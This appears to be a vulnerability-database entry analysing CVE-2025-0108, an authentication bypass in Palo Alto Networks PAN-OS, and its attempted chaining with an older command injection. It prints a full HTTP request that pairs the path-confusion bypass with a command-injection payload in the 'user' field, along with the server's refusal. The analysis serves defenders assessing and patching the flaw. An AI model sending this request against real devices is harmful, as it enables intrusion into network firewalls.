Moderate
CVE-2025-0108
CVE-2025-0108
Description
An authentication bypass in the Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to bypass the authentication otherwise required by the PAN-OS management web interface and invoke certain PHP scripts. While invoking these PHP scripts does not enable remote code execution, it can negatively impact integrity and confidentiality of PAN-OS.
You can greatly reduce the risk of this issue by restricting access to the management web interface to only trusted internal IP addresses according to our recommended best practices deployment guidelines https://live.paloaltonetworks.com/t5/community-blogs/tips-amp-tricks-how-to-secure-the-management-access-of-your-palo/ba-p/464431 .
This issue does not affect Cloud NGFW or Prisma Access software.
Add Assessment
Technical Analysis
On February 12, 2025, Palo Alto Networks published an advisory for CVE-2025-0108. The same day, Assetnote, the team that reported the vulnerability, published a comprehensive analysis. Exploitation for CVE-2025-0108 leverages a path confusion vulnerability in the PAN-OS management web service to access certain authenticated PHP files without administrator credentials.
In the original advisory, Palo Alto Networks stated “While invoking these PHP scripts does not enable remote code execution, it can negatively impact integrity and confidentiality of PAN-OS.” The advisory was updated on February 18, 2025 to state “Palo Alto Networks has observed exploit attempts that utilize the PoC, chaining it with the exploit for CVE-2024-9474 on unpatched and unsecured PAN-OS web management interfaces.” For reference, CVE-2024-9474 is an older authenticated command injection vulnerability that was published in November of 2024 with CVE-2024-0012, an authentication bypass vulnerability.
As of February 18, 2025, despite public reports of RCE attempts in the wild, no public RCE chain PoC has been published for CVE-2025-0108. Our own tests that attempted to chain the new CVE-2025-0108 authentication bypass with the older CVE-2024-9474 authenticated command injection vulnerability were not successful. Although access to the PHP page associated with CVE-2024-9474 is permitted and “200 OK” is returned, a secondary privilege check fails.
POST /unauth/%252e%252e/php/utils/createRemoteAppwebSession.php/PAN_help/x.css HTTP/1.1 Host: 192.168.181.142 Origin: https://192.168.181.142 Sec-Ch-Ua-Platform: "Windows" Accept-Language: en-US,en;q=0.9 Sec-Ch-Ua: "Not A(Brand";v="8", "Chromium";v="132" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Sec-Ch-Ua-Mobile: ?0 Accept: */* Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: font Referer: https://192.168.181.142/styles/login/css/login-admin.css?__version=1707420941 Accept-Encoding: gzip, deflate, br Priority: u=0 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 132 user=%60echo%20%24%28uname%20-a%29%20%3E%20%2Fvar%2Fappweb%2Fhtdocs%2Funauth%2Fwritten.php&userRole=superuser&remoteHost=&vsys=vsys1
HTTP/1.1 200 OK Date: Fri, 14 Feb 2025 14:05:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 32 Connection: keep-alive Set-Cookie: PHPSESSID=ss7o7epm8g755pp3aqu6bgqo6n; path=/; secure; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Allow: GET, HEAD, POST, PUT, DELETE, OPTIONS @start@Error: Unauthorized.@end@
That’s not to say that it can’t be done, just that we haven’t observed it working in tests. Although there may be some way to chain the newer authentication bypass with the older command injection, it also seems quite unlikely that such a chain would make sense from a logistical perspective. Both CVE-2024-9474, the authenticated command injection, and CVE-2024-0012, the authentication bypass, were predominantly fixed in the same patches. Furthermore, they were widely publicized together in November of 2024; it would be surprising to see CVE-2024-9474 unpatched with CVE-2024-0012 patched. If CVE-2024-0012 was not patched, there would be no need to exploit the newer CVE-2025-0108 authentication bypass.
Despite this context, CVE-2025-0108 is an impactful and important vulnerability for organizations running PAN-OS devices. It’s likely that some escalation path exists, if not a CVE-2024-9474 chain, so CVE-2025-0108 should be prioritized for patching. Additionally, per Palo Alto Networks recommendations, network access to the PAN-OS management interface should be as restrictive as possible to avoid unnecessary exposure.
02/19/25 NOTE: The Palo Alto Networks advisory page for CVE-2025-0108 has been updated to indicate that CVE-2025-0111, an authenticated file read, has also been observed in chained exploitation attempts with CVE-2025-0108 in the wild.
CVSS V3 Severity and Metrics
General Information
Vendors
Products
Weaknesses
References
Miscellaneous
